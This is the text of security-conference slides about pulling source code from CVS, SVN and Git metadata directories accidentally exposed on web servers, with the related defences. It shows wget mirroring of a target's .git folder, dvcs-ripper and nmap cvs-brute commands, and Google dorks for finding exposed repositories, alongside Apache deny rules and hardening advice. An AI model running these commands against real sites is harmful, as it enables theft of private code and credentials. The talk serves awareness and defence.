wonderful world of (distributed) scm or vcs
TRANSCRIPT
#BalCCon
Wonderful World of Distributed SCM:Opening closed source code
https://twitter.com/k0st
Vlatko Kosturjak
Agenda
Not coveredPhilosophical issues
Finding code
Old school SCM
New school SCM
How to get the source when its not open source
Questions and Answers
75 minutes
Disclaimer
This is a work of pure fiction
Any resemblance to anyone, living or dead is purely coincidental
The characters are fictional and of my own creation
The place, time and incidents are purely fictional
I don't take any responsibilities for your actions, consider yourself ethical and legal issues of your actions!
Look closer - I'm also virtual! :)
That source control management is really really great...
Versioning
Blame
Undo
Collaboration
Code review
Sign off
Integration
...
But...
...Have you thought about security implications?
First rule
If sensitiveDon't put source code on internet
Don't put SCM files on the internet
Don't put sensitive parts in web root
Don't...
Don't...
Don't...
Search for specific phrase, file, function or class
Just google for it! ;)
Internet does not forget! ;)
InstructionsStrings
Google above
@alexsotirov on 4th of Jul 2010:It's amazing what you can find on random Chinese sites if you start googling internal strings from closed-source applications
How about configs in repos?
Software.conf vs Software.conf-dist
Software.confMore dangerous
Danger of accidentaly commiting sensitive info
Software.conf-distLess dangerous
Still watchout wildcards *
Search?
Functionsodbc_connect
mysql_connect
Search enginesGoogle
GitHub
...
Old School
versioning systems
RCS
CVS
Subversion (SVN)
...
CVS
Concurrent Versions System
CVSEntries
Entries.Log
Repository
Root
Finding repository sourceProfit if it is Internet accessible
What can be extracted?
ArtifactsRepository location
Name of hidden filesIf present in repository
Repository user
Just enough for password guessing if online
DVCS-ripper
Examplerip-cvs.pl -v -u http://www.example.com
NmapNmap script=cvs-brute www.example.com
Profit!
Protection
Make it open source ;)
Remove SCM files if not needed
Web server configuration
Web deployment automation controls
...
SVN
Subversion
.svnprop-base
props
text-base
tmp
entries
Finding repository sourceProfit if it is Internet accessible
Sensitive files
Extraction of whole tree possible
.svn/entries content
dir/
0
svn://myprivatecode.com//repo/myweb
svn://myprivatecode.com//repo/myweb
user
SVN client 1.6+
No more .svn directories all aroundSingle .svn (just like git!)
Different formatIncompatible, of course ;)
Different fileswc.db SQLite database
SVN client 1.6+ extraction
Much easier
Much faster
Much robustNo more problems extracting interpreted filesLike PHP
Thank you SVN developers! ;)
Protection
Make it open source ;)
Remove SCM files if not needed
Web server configuration
Web deployment automation controls
...
Apache (main configuration file)
403 Forbidden Move along nothing to see
Order allow,deny Deny from all
404 Not found Pick somewhere elseAliasMatch \.svn /non-existant-page
Apache (.htaccess)
Using mod_rewrite RewriteEngine OnRewriteRule /\.svn /non-existant-404-page
IndexIgnore .svn
New School(distributed)
source code management systems
Git
Mercurial
Bazaar
...
Git!?
Google Dorks
Want source?
Get the repo:
mkdir git-testcd git-testwget --mirror --include-directories=/.git http://www.target.com/.git Get files
cd www.target.comgit reset --hardProfit!
http://www.skullsecurity.org/blog/2012/using-git-clone-to-get-pwn3d
Problem
Directory browsing disabled
Git: many ways...
Find archive of SCM
Bruteforce SHA1Bandwidth
Time
Partial SHA1 visibledifferent files
There must be the way...
Zombie mode on
I MUST GET THE SOURCEI MUST GET THE SOURCEI MUST GET THE SOURCEI MUST GET THE SOURCEI MUST GET THE SOURCEI MUST GET THE SOURCEI MUST GET THE SOURCEI MUST GET THE SOURCEI MUST GET THE SOURCEI MUST GET THE SOURCEI MUST GET THE SOURCEI MUST GET THE SOURCEI MUST GET THE SOURCE
DVCS-Pillage
It will rip the .git files when directory browsing disabledBy Adam Baldwin
Accessible from URL:https://github.com/evilpacket/DVCS-Pillage
Have few problemsHmm...
Problems...
Current methodsNot complete tree download methodPacked refs
git ls-files stage method
No support for branches
No support for other than http
Slooow...
HmmmWant whole tree / files
Branches
Support old protocols
Bruteforcing not feasable
Zombie mode on
I MUST GET THE FULL SOURCEI MUST GET THE FULL SOURCEI MUST GET THE FULL SOURCEI MUST GET THE FULL SOURCEI MUST GET THE FULL SOURCEI MUST GET THE FULL SOURCEI MUST GET THE FULL SOURCEI MUST GET THE FULL SOURCEI MUST GET THE FULL SOURCEI MUST GET THE FULL SOURCEI MUST GET THE FULL SOURCEI MUST GET THE FULL SOURCEI MUST GET THE FULL SOURCEI MUST GET THE FULL SOURCE...
Back to the drawing board!
RTFM
Solution is...
RTFMgit fsckit will tell what sha1 are missing
No partial recovery
Time to code my own toolWant whole tree
Branches
Support all protocols
FAST!!
DVCS-rip
It will rip the .git files when directory browsing disabled
It will rip ALL files and checkout repository for youNot partial
git fsck trick
Support forBranches
Any protocol (http/https/...)
Accessible from URL:https://github.com/kost/dvcs-ripper
DVCS-rip
How to run?
Example run: rip-git.pl -v -u http://www.example.com/.git/
It will automatically do "git checkout -f"
Profit!
Protection
Make it open source ;)
Remove SCM files if not needed
Web server configuration
Web deployment automation controls
...
Apache (main configuration file)
403 Forbidden Move along nothing to see
Order allow,deny Deny from all
404 Not found Pick somewhere elseAliasMatch \.git /non-existant-page
Apache (.htaccess)
Using mod_rewrite RewriteEngine OnRewriteRule /\.git /non-existant-404-page
IndexIgnore .git
How about others?
Mercurial
Bazaar
Checkout DVCS-PillageIt will handle git, hg and bzr
Accessible from URL:https://github.com/evilpacket/DVCS-Pillage
No tool available to detect
Most of the web/network scanners will not find thisNo awareness
Tools looks only this.git/ => 403
They should actually look.git/logs/HEAD => 200
.git/config => 200
.git/index => 200
...
Nmap NSE comes to rescue
Have to use latest Nmap versionScript is not in 6.01
It was broken in some previous Nmap versions
It looks all relevant git files.git/logs/HEAD
.git/config
...
nmap -sS -PS80,81,443,8080,8081 -p80,81,443,8080,8081 --script=http-git
PORT STATE SERVICE80/tcp open http| http-git:| Potential Git repository found at XX.XX.XX.XX:XX/.git/ (found 5 of 6expected files)
Evolving
Good example of open source collaboration between projects
WiK and Mubix: gitDigger (Defcon 21 / Bsides Vegas)
https://github.com/wick2o/gitDigger
Google dorks
.git intitle:index of
.svn intitle:index of
CVS intitle:index of
.hg intitle:index of
.bzr intitle:index of
(I guess you got idea already)...
Searching for standard interfaces
InterfacesRedmine
ViewCS
ViewCVS
Gitweb
...
Google DorksPowered by ViewCS
Bing as well...
Recommendations for developers
Do not store passwords and API keys on SCMConfig.php vs config.php-dist
Do not store sensitive info on SCM
Separate test and production data
Being paranoid is good feeling
Recommendations for system administrators
Proactively forbid serving all SCM files on web servers
Periodical check for standard directories of SCMs, i.e.:find /web -name .svn
find /web -name .git
wget http://www.site.com/svn/
Is there any need to have source code available at all?
Recommendations for management and auditors
Ask how source code management is done
Ask what security controls are there to protect source codeWhat controls are there to protect source code leaks?
What controls are there to protect passwords and keys leaks?
What controls are there to protect sensitive information in source code and configurations?
References
https://github.com/evilpacket/DVCS-Pillage
https://github.com/kost/DVCS-Pillage
https://github.com/kost/dvcs-ripper
https://github.com/anantshri/svn-extractor
http://blog.anantshri.info/svn-extractor-for-web-pentesters/
http://www.adamgotterer.com/post/28125474053/hacking-the-svn-directory-archive
http://www.cirt.net/svnpristine
http://pen-testing.sans.org/blog/2012/12/06/all-your-svn-are-belong-to-us/comment-page-1/
http://nmap.org/nsedoc/scripts/cvs-brute-repository.html
http://nmap.org/nsedoc/scripts/cvs-brute.html
http://nmap.org/nsedoc/scripts/http-git.html
Questions? Comments? Feedbacks?
@k0st
This is zero
Acknowledgements: Adam Baldwin, Ron Bowes,Alex Weber,...